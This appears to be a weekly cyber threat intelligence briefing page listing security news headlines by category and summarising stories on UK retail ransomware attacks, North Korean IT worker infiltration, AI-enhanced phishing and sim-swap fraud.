Kettering Health hit by system-wide outage after ransomware attack
Arla Foods confirms cyber attack disrupts production, causes delays
Phishing & Email Based Attacks
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
Polymorphic phishing attacks flood inboxes - Help Net Security
New Phishing Attack Mimic as Zoom Meeting Invites to Steal Login Details
Novel Phishing Attack Combines AES, Poisoned npm Packages
Russian Threat Actor TAG-110 Goes Phishing in Tajikistan
Business Email Compromise (BEC)/Email Account Compromise (EAC)
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
Other Social Engineering
Service desks are under attack: What can you do about it?
3am Ransomware Adopts Email Bombing, Vishing Combo Attack
AI voice hijacking: How well can you trust your ears? - Help Net Security
How to Win Followers and Scamfluence People | WIRED
Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine
SIM scammer who helped hijack SEC X account put behind bars • The Register
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
Fraud, Scams and Financial Crime
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
‘Free hamper – just pay P&P’: the scam offers targeting your bank details | Scams | The Guardian
How to Win Followers and Scamfluence People | WIRED
Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine
Artificial Intelligence
Many rush into GenAI deployments, frequently without a security net - Help Net Security
Uncensored AI Tool Raises Cyber Security Alarms - Infosecurity Magazine
Mapping the Future of AI Security - Security Boulevard
Data Security Risk: Analysis of AI Tools Reveals 84% Breached | Security Magazine
AI voice hijacking: How well can you trust your ears? - Help Net Security
How to Win Followers and Scamfluence People | WIRED
Security Threats of Open Source AI Exposed by DeepSeek
Be careful what you share with GenAI tools at work - Help Net Security
Finding the right balance between 'vibe coders' and security - IT Security Guru
GitLab's AI Assistant Opened Devs to Code Theft
Meta plans to train AI on EU user data from May 27 without consent
Irish DPC okays Meta's EU AI training plans • The Register
2FA/MFA
What is Universal 2nd Factor (U2F)? | Definition from TechTarget
Malware
Lumma infostealer infected about 10 million systems before global disruption | CyberScoop
Malware Evasion Techniques - What Defenders Need to Know
100+ Fake Chrome Extensions Found Hijacking Sessions, Stealing Credentials, Injecting Ads
Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access
Novel Phishing Attack Combines AES, Poisoned npm Packages
Data-stealing Chrome extensions impersonate Fortinet, YouTube, VPNs
Fake CAPTCHA Attacks Deploy Infostealers and RATs in a Multistage Payload Chain | Trend Micro (US)
Warning! Malicious Chrome extensions found mimicking legit tools | PCWorld
Feds finger Russian 'Qakbot mastermind', 700k computers hit • The Register
What Is a Computer Virus, Really?
Bots/Botnets
Hackers unleash botnet capable of ‘killing most companies’ | The Independent
Mobile
Phone theft is on the rise - 7 ways to protect your device before it's too late | ZDNET
How to hack a phone: 7 common attack methods explained | CSO Online
O2 UK patches bug leaking mobile user location from call metadata
Say goodbye to passwords: Android’s bold security shift explained - Talk Android
Denial of Service/DoS/DDoS
Internet of Things – IoT
Growing Cyberthreats To The Internet Of Things
Why console makers can legally brick your game console - Ars Technica
Data Breaches/Leaks
Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials | WIRED
M&S faces multimillion-pound lawsuit over cyber attack data leak - Retail Gazette
M&S’ Slow Recovery From Cyber Attack Puts it at Risk of Lasting Damage
Legal Aid Agency Warns Lawyers, Defendants on Data Breach
Solicitors criticise ‘antiquated’ Legal Aid Agency IT system after cyber attack | The Independent
M&S CEO faces multimillion-pound pay hit after cyber attack - Retail Gazette
Legal Aid cyber attack 'more extensive than originally understood'
M&S cyber attack has cost £300m so far - and disruption will continue until July
Lawyers eyeing M&S cyber attack slammed as ‘predatory’ | The Grocer
Large Retailers Land in Scattered Spider's Ransomware Web
UK businesses 'ignore free advice' to stop cyber attacks, GCHQ warns as M&S still reels... - LBC
More Law Firms Join the Surge of Class Action Lawsuits Against Coinbase in Wake of Cyber Attack
Coinbase confirms insider breach affects 70,000 users • The Register
Cyber attack on Legal Aid Agency exposed ‘significant amount’ of applicant data - LBC
11 Of The Worst Data Breaches In The History Of The Internet
Report: Over 50% of top oil and gas firms hit by data breaches in last 30 days | World Pipelines
Debt Collector Data Breach Affects 200,000 Harbin Clinic Patients - Infosecurity Magazine
Lessons from the M&S cyber attack: how brands can survive digital catastrophe | Creative Boom
Coca-Cola workers' info allegedly stolen by hackers | Cybernews
GitLab's AI Assistant Opened Devs to Code Theft
Organised Crime & Criminal Actors
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
LockBit Leaks Reveal Drive to Recruit Ransomware Newbies
‘Free hamper – just pay P&P’: the scam offers targeting your bank details | Scams | The Guardian
The cyber criminals are now doing PR | PR Week UK
How to Win Followers and Scamfluence People | WIRED
European Union sanctions Stark Industries for enabling cyber attacks
Attacker Specialization Puts Threat Modeling on Defensive
SIM scammer who helped hijack SEC X account put behind bars • The Register
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
Hackers use fake Ledger apps to steal Mac users’ seed phrases
Coinbase confirms insider breach affects 70,000 users • The Register
Identity Security Has an Automation Problem—And It's Bigger Than You Think
Insider Risk and Insider Threats
Coinbase confirms insider breach affects 70,000 users • The Register
Identity Security Has an Automation Problem—And It's Bigger Than You Think
Insurance
UK Retail Cyber Attacks May Drive Up US Insurance Premiums
Supply Chain and Third Parties
UK supermarket distributor suffers ransomware attack - BBC News
Third-party vendors responsible for 41.8% of fintech data breaches, survey claims
NHS England Rolls Out Voluntary Cyber Charter for IT Suppliers
Cloud/SaaS
10 SaaS Security Risks Most Organisations Miss | Grip - Security Boulevard
Outages
Delta’s lawsuit against CrowdStrike given go-ahead • The Register
Mobile carrier Cellcom confirms cyber attack behind extended outages
Identity and Access Management
Exposed Credentials: Powering the Global Cyber Crime Wave
Modern authentication: Why OIDC and SAML are just the start - Security Boulevard
Identity Security Has an Automation Problem—And It's Bigger Than You Think
Encryption
Preparing for the post-quantum era: a CIO's guide to securing the future of encryption | CyberScoop
Governments continue losing efforts to gain backdoor access to secure communications
Passwords, Credential Stuffing & Brute Force Attacks
Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials | WIRED
Warning — Stealing Windows Passwords Is As Easy As APT 123
Exposed Credentials: Powering the Global Cyber Crime Wav
Social Media
Meta plans to train AI on EU user data from May 27 without consent
Irish DPC okays Meta's EU AI training plans • The Register
Malvertising
Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine
Hackers are spreading fake password manager ransomware via Bing ads | PCWorld
Regulations, Fines and Legislation
Japan arms itself against foreign cyber attacks with new law
GDPR Changes Risk Undermining its Principles, Civil Society Warns - Infosecurity Magazine
NSA cyber director Luber to retire at month’s end | The Record from Recorded Future News
Governments continue losing efforts to gain backdoor access to secure communications
Japan passed a law allowing preemptive offensive cyber actions
FTC finalizes order requiring GoDaddy to secure hosting services
CVE Disruption Threatens Foundations of Defensive Security
Members vexed by Cyber Command turmoil - Roll Call
Models, Frameworks and Standards
GDPR Changes Risk Undermining its Principles, Civil Society Warns - Infosecurity Magazine
NCC Group Expert Warns UK Firms to Prepare for New Cyber Security Bill - Infosecurity Magazine
Collaboration is key in the Cyber Assessment Framework | UKAuthority
Inside MITRE ATT&CK v17: Smarter defences, sharper threat intel - Help Net Security
Cyber Security Now Central to Digital Health M&A Success
Data Protection
Meta plans to train AI on EU user data from May 27 without consent
Irish DPC okays Meta's EU AI training plans • The Register
Careers, Working in Cyber and Information Security
UK Cyber Vacancies Growing 12% Per Year - Infosecurity Magazine
Why so many military veterans move into cyber security - BBC News
Law Enforcement Action and Take Downs
Lumma infostealer infected about 10 million systems before global disruption | CyberScoop
Police takes down 300 servers in ransomware supply-chain crackdown
Police arrests 270 dark web vendors, buyers in global crackdown
Feds finger Russian 'Qakbot mastermind', 700k computers hit • The Register
SIM scammer who helped hijack SEC X account put behind bars • The Register
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
US Navy petty officer charged in horrific CSAM case • The Register
Teen to plead guilty to PowerSchool extortion attack • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
From 60 to 4,000: NATO's Locked Shields Reflects Cyber Defence Growth - SecurityWeek
China
Chinese hackers breach US local governments using Cityworks zero-day
Ivanti EPMM flaw exploited by Chinese hackers to breach govt agencies
Chinese ‘kill switches’ found in US solar farms
Russia
Russia-linked APT28 targets western logistics entities and technology firms
Russian APT Groups Intensify Attacks in Europe with Zero-Day Exploits - Infosecurity Magazine
Nation-state APTs ramp up attacks on Ukraine and the EU - Help Net Security
Scattered Spider's Ties to Russia: Closer Than We Think?
Unpacking Russia's cyber nesting doll - Atlantic Council
Europe sanctions Putin's pals over 'hybrid' threats • The Register
Russia to enforce location tracking app on all foreigners in Moscow
U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cyber Crime Operation
Russian Threat Actor TAG-110 Goes Phishing in Tajikistan
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Tools and Controls
You do a fire drill, so do a cyber attack drill
100+ Fake Chrome Extensions Found Hijacking Sessions, Stealing Credentials, Injecting Ads
Data-stealing Chrome extensions impersonate Fortinet, YouTube, VPNs
Finding the right balance between 'vibe coders' and security - IT Security Guru
Lessons from the M&S cyber attack: how brands can survive digital catastrophe | Creative Boom
NCSC Helps Firms Securely Dispose of IT Assets - Infosecurity Magazine
Modern authentication: Why OIDC and SAML are just the start - Security Boulevard
Threat intelligence is crucial but organisations struggle to use it
The hidden gaps in your asset inventory, and how to close them - Help Net Security
How to Develop & Communicate Metrics for CSIRPs
Warning! Malicious Chrome extensions found mimicking legit tools | PCWorld
What is Universal 2nd Factor (U2F)? | Definition from TechTarget
Identity Security Has an Automation Problem—And It's Bigger Than You Think
GitLab's AI Assistant Opened Devs to Code Theft
AI hallucinations and their risk to cyber security operations - Help Net Security
What good threat intelligence looks like in practice - Help Net Security
Other News
SMBs remain easy pickings for cyber criminals - here’s why | TechRadar
From 60 to 4,000: NATO's Locked Shields Reflects Cyber Defence Growth - SecurityWeek
Cyber security: Lack of planning and outdated IT systems putting Scotland at risk
Healthcare Cyber Attacks Intensify, Sector Now Prime Target - Infosecurity Magazine
Cyber attack threat keeps me awake at night, bank boss says - BBC News
How to safeguard your small business in the hybrid work era: 5 top cyber security solutions | ZDNET
UK 'extremely dependent' on the US for space security • The Register
Why shipping can’t wait for another cyber security crisis - Splash247
German Cyber Agency Sounds Warning on Grid Vulnerabilities
UK Science Funding HQ hit by 5.4M cyber assaults as attacks increase 600%
Vulnerability Management
Russian APT Groups Intensify Attacks in Europe with Zero-Day Exploits - Infosecurity Magazine
Nation-state APTs ramp up attacks on Ukraine and the EU - Help Net Security
CVE Disruption Threatens Foundations of Defensive Security
Vulnerability Exploitation Probability Metric Proposed by NIST, CISA Researchers - SecurityWeek
NIST's LEV Equation to Rate Chances a Bug Was Exploited
Vulnerabilities
Same suspected Chinese spies again attacking Ivanti bugs • The Register
Ivanti RCE attacks 'ongoing,' exploitation hits clouds • The Register
NATO-Flagged Vulnerability Tops Latest VMware Security Patch Batch - SecurityWeek
Critical OpenPGP.js Vulnerability Allows Spoofing - SecurityWeek
GitLab, Atlassian Patch High-Severity Vulnerabilities - SecurityWeek
Unpatched Windows Server Flaw Threatens AD Users
Cisco Patches High-Severity DoS, Privilege Escalation Vulnerabilities - SecurityWeek
Mozilla fixed zero-days demonstrated at Pwn2Own Berlin 2025
Windows 10 emergency updates fix BitLocker recovery issues
Multiple pfSense Firewall Vulnerabilities Let Attackers Inject Malicious Codes
RCE Vulnerability Found in RomethemeKit For Elementor Plugin - Infosecurity Magazine
O2 UK patches bug leaking mobile user location from call metadata
Critical Zero-Days Found in Versa Networks SD-WAN/SASE Platform - Infosecurity Magazine
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 16 May 2025
Black Arrow Cyber Threat Intelligence Briefing 16 May 2025:
-Thousands of UK Companies 'Could Have M&S-Style Hackers Waiting in Their Systems'
-North Korean IT Workers Are Being Exposed on a Massive Scale, Potentially Thousands of Businesses Infiltrated
-‘They Yanked Their Own Plug’: How Co-op Averted an Even Worse Cyber Attack
-UK Government Publishes New Software and Cyber Security Codes of Practice
-Ransomware and the Board’s Role: What You Need to Know
-73% of CISOs Admit Security Incidents Due to Unknown or Unmanaged Assets
-AI Is Making Phishing Emails Far More Convincing with Fewer Typos and Better Formatting: Here’s How to Stay Safe
-Ransomware Enters ‘Post-Trust Ecosystem’
-Sim-Swap Fraud Rises by 1,000%: Why You Should Use App-Based, not SMS-Based, Two-Factor Authentication
-Cyber Threats Outpace Global Readiness
-CISOs Must Speak Business to Earn Executive Trust
-Downing St Updating Secret Contingencies for Russia Cyber Attack, Report Claims
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
There has been a continued rise in the sophistication and scale of social engineering threats, particularly phishing campaigns enhanced by generative AI. These attacks increasingly bypass traditional filters and exploit executive impersonation, with one malicious email now detected every 42 seconds. Simultaneously, criminal groups are embedding themselves within corporate environments for prolonged periods, enabled by ransomware-as-a-service and AI-driven deception. This underscores the need for continuous monitoring, behaviour-based threat detection, and stronger identity verification practices across organisations.
Meanwhile, the global cyber threat landscape is becoming more fragmented and unpredictable. Ransomware gangs are operating without clear allegiances, making extortion attempts more erratic and harder to trace. At the same time, state-aligned actors, including North Korean IT operatives, are covertly infiltrating Western businesses under fake identities, exploiting remote work trends to fund illicit national objectives. Despite growing investment, nearly three-quarters of CISOs admit incidents caused by unknown or unmanaged assets—highlighting the critical importance of full visibility across the digital estate.
We believe boards must move from passive oversight to active engagement. The UK’s new Cyber Governance Code of Practice reflects this shift, encouraging directors to treat cyber risk as integral to business resilience. As threats intensify, governance, testing, and strategic communication must become core pillars of cyber readiness.
Top Cyber Stories of the Last Week
Thousands of UK Companies 'Could Have M&S-Style Hackers Waiting in Their Systems'
There are warnings that a growing number of UK businesses may already be compromised, with attackers silently embedded in their systems awaiting the right moment to strike. This follows a surge in high-profile incidents including M&S, the Coop, Dior and Harrods, linked to an evolution of criminal tactics. The emergence of ‘ransomware-as-a-service’ is enabling less skilled actors to launch sophisticated attacks using pre-built tools. Combined with generative AI-enhanced social engineering, the risk landscape is becoming more unpredictable. Many firms remain unaware of these intrusions until damage is done, highlighting the urgent need for continuous monitoring and stronger internal controls.
North Korean IT Workers Are Being Exposed on a Massive Scale, Potentially Thousands of Businesses Infiltrated
North Korean IT workers are increasingly infiltrating Western businesses by posing as legitimate remote developers, generating hundreds of millions of dollars annually to fund the regime’s weapons programmes and evade sanctions. A new report has exposed over 1,000 email addresses linked to these operations, with individuals often using fake identities, AI tools, and face-changing software to secure roles. Despite operating globally from Laos to Russia, many leave digital trails that reveal their activities. The scale and adaptability of these operations, likened to a state-run crime syndicate, underline the need for tighter scrutiny of remote hiring and identity verification processes.
‘They Yanked Their Own Plug’: How Co-op Averted an Even Worse Cyber Attack
The UK supermarket chain Co-op appears to have avoided a more severe cyber attack by rapidly disconnecting its systems after detecting malicious activity, a decision that disrupted operations but ultimately prevented ransomware deployment. In contrast, M&S suffered greater system compromise, with ongoing issues affecting online orders and store operations. The incident is costing M&S an estimated £43 million per week. The cyber crime group responsible, linked to a service known as DragonForce, claims to have accessed both retailers’ networks. Co-op’s swift response is viewed by experts as a decisive move that limited long-term damage but highlighted the continuing challenge of restoring public trust.
UK Government Publishes New Software and Cyber Security Codes of Practice
The UK government has introduced two new voluntary codes to help raise standards in cyber security and software resilience. The Cyber Governance Code of Practice, aimed at boards and directors of medium and large organisations, sets out how leadership teams should govern and monitor cyber security risks. It encourages directors to embed cyber governance into business risk management, focusing on oversight rather than operational duties. Complementing this, the Software Security Code of Practice outlines 14 principles for secure software development and maintenance, aligned with international frameworks. While voluntary, both codes may soon influence contractual requirements in supply chains.
Ransomware and the Board’s Role: What You Need to Know
Ransomware continues to escalate in scale and complexity, with attackers leveraging AI, remote work gaps, and third-party exposures to increase pressure on organisations. Boards are being urged to actively engage in cyber resilience planning, ensuring foundational controls such as multi-factor authentication, immutable backups, and incident response protocols are in place. Emphasis is also placed on testing recovery capabilities, reviewing cyber insurance terms, and rehearsing decision-making through tabletop exercises. Crucially, boards must prepare for the strategic, legal and reputational implications of whether to pay a ransom, with pre-agreed decision frameworks now seen as essential for effective crisis response.
73% of CISOs Admit Security Incidents Due to Unknown or Unmanaged Assets
Nearly three-quarters of cyber security leaders admit to experiencing security incidents due to unknown or unmanaged assets within their IT environments. Despite 90% acknowledging that attack surface management directly affects business risk, fewer than half of organisations have dedicated tools in place, and 58% lack continuous monitoring. The consequences of inaction are wide-ranging, with leaders citing risks to business continuity, customer trust, financial performance, and supplier relationships. As digital infrastructures grow more complex, firms are being urged to treat cyber risk management as a strategic priority rather than a technical afterthought.
AI Is Making Phishing Emails Far More Convincing with Fewer Typos and Better Formatting: Here’s How to Stay Safe
AI is transforming phishing into a more dangerous and convincing threat. New analysis shows that email-based scams have risen by 70% year-on-year, with one malicious message detected every 42 seconds. These attacks now feature flawless grammar, professional formatting, and realistic sender details, often impersonating senior executives. Traditional email filters are struggling, particularly against polymorphic attacks that constantly change to evade detection. Over 40% of malware in these campaigns is newly observed, including remote access tools. With generative AI accelerating this trend, organisations must shift from legacy defences to behaviour-based threat detection and strengthen verification procedures across the organisation.
Ransomware Enters ‘Post-Trust Ecosystem’
Ransomware threats have entered a new, more fragmented era, where traditional trust between cyber criminals has broken down following major law enforcement operations. High-profile takedowns in 2024 disrupted dominant ransomware groups, leading to reduced ransom payments and a shift away from large, centralised platforms. The result is a more unpredictable threat landscape, marked by agile, peer-to-peer groups and an increase in encryption-less extortion. This decentralisation, alongside the rise of ransomware ‘cartels’, signals an evolution in attacker tactics that is lowering entry barriers and complicating defensive strategies for organisations of all sizes.
Sim-Swap Fraud Rises by 1,000%: Why You Should Use App-Based, not SMS-Based, Two-Factor Authentication
Sim-swap fraud in the UK has surged by over 1,000%, with nearly 3,000 cases reported in 2024, up from just 289 the previous year. Criminals exploit mobile phone providers to hijack victims' numbers, bypassing SMS-based two-factor authentication and gaining access to personal accounts. Older consumers and sectors like retail and telecoms are particularly vulnerable. The rise of eSims is expected to further increase risk. In one case, a victim lost £50,000 while abroad after fraudsters took control of his accounts. Organisations are urged to strengthen identity verification processes and encourage customers to use app-based authentication methods where possible.
Cyber Threats Outpace Global Readiness
The World Economic Forum has found that cyber threats are accelerating faster than many nations and organisations can respond, with 72% of businesses reporting an increasingly risky environment. Nearly 60% have already revised their cyber security strategies in response to global tensions and emerging threats. Despite progress in areas like infrastructure protection and public-private collaboration, most national approaches remain underdeveloped, especially in supporting small businesses and defining measurable outcomes. Just 14% of organisations feel fully prepared, highlighting a growing skills gap and the need for cyber security to be treated not only as risk mitigation but as a driver of trust and innovation.
CISOs Must Speak Business to Earn Executive Trust
Many business leaders still view cyber security as a barrier to speed and innovation, rather than a business enabler. There’s an argument that this perception must shift, with CISOs framing their role in terms of operational efficiency, resilience, and growth. By automating security controls and embedding them within business functions, CISOs can eliminate bottlenecks while reducing risk. Influence grows when security is expressed in business terms, highlighting revenue protection, risk-adjusted innovation, and customer trust. Effective CISOs use clear data, visual storytelling, and scenario-based dialogue to demonstrate value, helping boards see cyber security as a strategic partner rather than a cost centre.
Downing St Updating Secret Contingencies for Russia Cyber Attack, Report Claims
The UK government is reportedly updating its national defence strategy to reflect the rising threat of state-backed cyber attacks, particularly from Russia. The revised plans will, for the first time, include specific scenarios involving cyber attacks on critical infrastructure such as power grids, gas terminals and undersea cables. The existing contingency plan, last updated in 2005, is considered outdated given today’s cyber threat landscape. A recent risk assessment warned that such attacks could cause civilian casualties and severe disruption to essential services. Ministers are now preparing strategies for maintaining government operations during wartime or major national emergencies.
Sources:
https://www.wired.com/story/north-korean-it-worker-scams-exposed/
https://www.bbc.co.uk/news/articles/cwy382w9eglo
https://corpgov.law.harvard.edu/2025/05/10/ransomware-and-the-boards-role-what-you-need-to-know/
https://www.csoonline.com/article/3980431/more-assets-more-attack-surface-more-risk.html
https://www.infosecurity-magazine.com/news/ransomware-enters-posttrust/
https://www.scworld.com/brief/report-cyber-threats-outpace-global-readiness
Governance, Risk and Compliance
A third of enterprises have been breached despite increased cyber security investment | TechRadar
Why Every CISO Should Be Gunning For A Seat At The Board Table
The CIO Role Is Expanding -- And So Are the Risks of Getting It Wrong
Fostering Resilience in Cybersecurity: Prevent Burnout and Enhance Sec Ops | MSSP Alert
Ransomware and the Board’s Role: What You Need to Know
Report: Cyber threats outpace global readiness | SC Media
CISOs must speak business to earn executive trust - Help Net Security
Cyber cover needs to be a board conversation business chiefs warned
What is business resilience? | Definition from TechTarget
How to Successfully Evaluate IT Project Risk
Tackling threats and managing budgets in an age of AI - Tech Monitor
CIOs paying too much for not enough IT security - survey - TechCentral.ie
Infosec Layoffs Aren't the Bargain Boards May Think
Building Effective Security Programs Requires Strategy, Patience, and Clear Vision
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware Enters ‘Post-Trust Ecosystem,’ NCA Cyber Expert Says - Infosecurity Magazine
UK retailers face 10% rises in premiums after cyber attacks
Ransomware and the Board’s Role: What You Need to Know
The ransomware landscape in 2025 | Kaspersky official blog
Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders
Companies take an average of four months to report a ransomware attack
Data Exfiltration is the New Ransomware in Evolving Cyber Landscape
How Interlock Ransomware Affects the Defense Industrial Base Supply Chain
Ransomware spreads faster, not smarter - Help Net Security
Ransomware attacks up over 120 percent in two years
BianLian and RansomExx Exploit SAP NetWeaver Flaw to Deploy PipeMagic Trojan
"Endemic" Ransomware Prompts NHS to Demand Supplier Action - Infosecurity Magazine
Threat hunting case study: Medusa ransomware | Intel 471
You think ransomware is bad? Wait until it infects CPUs • The Register
Beware — These Ransomware Hackers Are Watching You Work
Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency
Ransomware Victims
Marks and Spencer could face 12% drop in profits after cyber attacks
M&S to make £100m cyber claim from Allianz and Beazley
UK retailers face 10% rises in premiums after cyber attacks
M&S Admit Customer Data Stolen in Cyber Incident | SC Media UK
What we know about DragonForce ransomware • The Register
M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent
'They yanked their own plug': How Co-op averted an even worse cyber attack - BBC News
How Interlock Ransomware Affects the Defense Industrial Base Supply Chain
Coinbase Rejects $20M Ransom After Rogue Contractors Bribed to Leak Customer Data - SecurityWeek
Coinbase Targeted In $20 Million Extortion Plot Tied To Insider Data Leak - FinanceFeeds
Largest US steel manufacturer puts production on the backburner after cyber attack | TechRadar
Nova Scotia Power discloses data breach after March security incident
Security Firm Andy Frain Says 100,000 People Impacted by Ransomware Attack - SecurityWeek
Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine
Phishing & Email Based Attacks
New Phishing Attack Abusing Blob URLs to Bypass SEGs and Evade Analysis
Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders
Focused Phishing: Attack Targets Victims With Trusted Sites and Live Validation
This Microsoft 365 phishing campaign can bypass MFA - here's what we know | TechRadar
Email trap exposes 49K stockbroker customer records | Cybernews
Edinburgh schools targeted in cyber attack as pupils passwords reset - Edinburgh Live
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Despite drop in cyber claims, BEC keeps going strong - Help Net Security
Other Social Engineering
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
‘Hello pervert’: the sextortion scam claiming to have videoed you | Money | The Guardian
Hackers now testing ClickFix attacks against Linux targets
88% of Executives Had Home Floor Plans Available Online | Security Magazine
Fraud, Scams and Financial Crime
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
Fraud Losses Hit $11m Per Company as Customers Abuse Soars - Infosecurity Magazine
M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent
4 times data breaches ramped up the UK's fraud risk - Which?
European Police Bust €3m Investment Fraud Ring - Infosecurity Magazine
‘Hello pervert’: the sextortion scam claiming to have videoed you | Money | The Guardian
Deepfake voices of senior US officials used in scams: FBI • The Register
Deepfake attacks could cost you more than money - Help Net Security
International Crime Rings Defraud US Gov't Out of Billions
Artificial Intelligence
Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders
Cisco: Majority of Businesses Unprepared for AI Cyberattacks
NCSC sounds warning over AI threat to critical national infrastructure | UKAuthority
In the AI age, excessive data accumulation is a cyber security threat - Nikkei Asia
Can Cyber Security Keep Up With the AI Arms Race?
AI-Powered DDoS Attacks Are Changing the Threat Landscape | IT Pro
Deepfake voices of senior US officials used in scams: FBI • The Register
Deepfake attacks could cost you more than money - Help Net Security
Why security teams cannot rely solely on AI guardrails - Help Net Security
Over Three Thousand macOS Cursor Users Compromised
Deepfake Defense in the Age of AI
AI vs AI: How cyber security pros can use criminals’ tools against them - Help Net Security
FTC wants a new, segregated software system to police deepfake porn | CyberScoop
Tackling threats and managing budgets in an age of AI - Tech Monitor
Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures
noyb sends Meta C&D demanding no EU user data AI training • The Register
How To Remove Meta AI From All Your WhatsApp Chats
2FA/MFA
This Microsoft 365 phishing campaign can bypass MFA - here's what we know | TechRadar
Malware
Malware landscape dominated by FakeUpdates | SC Media
Over Three Thousand macOS Cursor Users Compromised
Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures
Bots/Botnets
7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. - Dutch Operation
Police dismantles botnet selling hacked routers as residential proxies
Mobile
M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent
Denial of Service/DoS/DDoS
AI-Powered DDoS Attacks Are Changing the Threat Landscape | IT Pro
A cyber attack briefly disrupted South African Airways operations
Internet of Things – IoT
UK report uncovers serious security flaws in business IoT devices
Data Breaches/Leaks
Company and Personal Data Compromised in Recent Insight Partners Hack - SecurityWeek
Insight Partners fears secret financial info cyber-stolen • The Register
4 times data breaches ramped up the UK's fraud risk - Which?
Nova Scotia Power discloses data breach after March security incident
Ascension reveals personal data of 437,329 patients exposed in cyberattack
Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine
Email trap exposes 49K stockbroker customer records | Cybernews
Fashion giant Dior discloses cyberattack, warns of data breach
Australian Human Rights Commission Discloses Data Breach - SecurityWeek
160,000 Impacted by Valsoft Data Breach - SecurityWeek
Organised Crime & Criminal Actors
How Security Has Changed the Hacker Marketplace
NatWest facing 100 million cyber attacks each month as experts reveal ‘staggering’ scale... - LBC
Kosovo authorities extradited admin of the cybercrime marketplace BlackDB.cc
Andrei Tarasov: Inside the Journey of a Russian Hacker on the FBI’s Most Wanted List - SecurityWeek
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Germany Shuts Down eXch Over $1.9B Laundering, Seizes €34M in Crypto and 8TB of Data
Coinbase data breach exposes customer info and government IDs
Coinbase Rejects $20M Ransom After Rogue Contractors Bribed to Leak Customer Data - SecurityWeek
Telegram shuts ‘largest darknet marketplace to have ever existed’
Insider Risk and Insider Threats
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
Layoffs pose a cybersecurity risk: Here's why offboarding matters - Help Net Security
Insider risk management needs a human strategy - Help Net Security
How working in a stressful environment affects cybersecurity - Help Net Security
Insurance
M&S to make £100m cyber claim from Allianz and Beazley
UK retailers face 10% rises in premiums after cyber attacks
Despite drop in cyber claims, BEC keeps going strong - Help Net Security
Cyber cover needs to be a board conversation business chiefs warned
Supply Chain and Third Parties
How Interlock Ransomware Affects the Defense Industrial Base Supply Chain
"Endemic" Ransomware Prompts NHS to Demand Supplier Action - Infosecurity Magazine
Cloud/SaaS
Microsoft Listens to Security Concerns and Delays New OneDrive Sync - Security Boulevard
Microsoft Teams will soon block screen capture during meetings
Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine
Identity and Access Management
The Persistence Problem: Why Exposed Credentials Remain Unfixed—and How to Change That
Linux and Open Source
New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine
Hackers now testing ClickFix attacks against Linux targets
Passwords, Credential Stuffing & Brute Force Attacks
The Persistence Problem: Why Exposed Credentials Remain Unfixed—and How to Change That
